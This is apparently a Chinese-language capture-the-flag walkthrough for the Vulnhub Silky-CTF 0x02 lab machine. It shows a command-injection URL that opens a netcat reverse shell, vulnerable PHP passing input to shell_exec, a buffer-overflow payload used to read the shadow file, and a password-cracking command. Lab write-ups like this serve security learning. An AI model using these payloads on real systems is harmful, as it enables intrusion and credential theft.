Silky-CTF: 0x02 Vulhub Walkthrough - APT-101

来源：cnblogs　　作者：APT-101　　时间：2019/9/23 8:50:10　　对本文有异议

靶机地址：

https://www.vulnhub.com/entry/silky-ctf-0x02,307/

主机扫描：

HTTP进行目录爆破

尝试SQL注入会被封掉IP

经过尝试发现username字段存在命令执行的漏洞

我们执行进行shell反弹

http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.202.132%201234&password=123456

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

amdin.php

<?php
if(isset($_GET["username"])){
echo shell_exec($_GET["username"]);
if($_GET["username"] != "Admin" && $_GET["password"] != "ufoundmypasswordlolbutidontthinkso")
echo "Falscher Nutzernamen oder falsches Passwort";
}
?>

接下来进行提权操作：

find / -perm -g=s -type f 2>/dev/null

看起来应该是利用缓冲区溢出，导入shadow文件，这里我们要构造十六进制的payload

./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')

破解密码

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

OVER!

原文链接：http://www.cnblogs.com/hack404/p/11563065.html

友情链接：直通硅谷　点职佳　北美留学生论坛

各类黑客大马默认密码后门

蓝凌OA前台任意文件读取漏洞利用

银河麒麟SP2 auditd服务内存泄露问题

confluence 挖矿木马应急响应 - APT-101

信息安全题目整理（1）

时间同步（NTP/PTP）技术原理介绍

apache log4j2 漏洞复现linux【纯详版】

Kali proxychains

使用tor实现对网络的匿名访问

网络安全推荐文章

异构数据源数据同步 → 从源码分析 DataX 敏感信息的加解密

FFmpeg开发笔记（三十八）APP如何访问SRS推流的RTMP直播地址

Vulnhub-ICA01

劫持TLS绕过canary && 堆和栈的灵活转换

第二届黄河流域网络安全技能挑战赛Web_wirteup

深入理解高级加密标准（Advanced Encryption Standard）

渗透测试-信息收集

RC4Drop加密技术：原理、实践与安全性探究

知名压缩软件 xz 被植入后门，黑客究竟是如何做到的？

《熬夜整理》保姆级系列教程-玩转Wireshark抓包神器教程(1)-初识Wireshark - 北京-宏哥

网络安全热门文章

网络安全推荐文章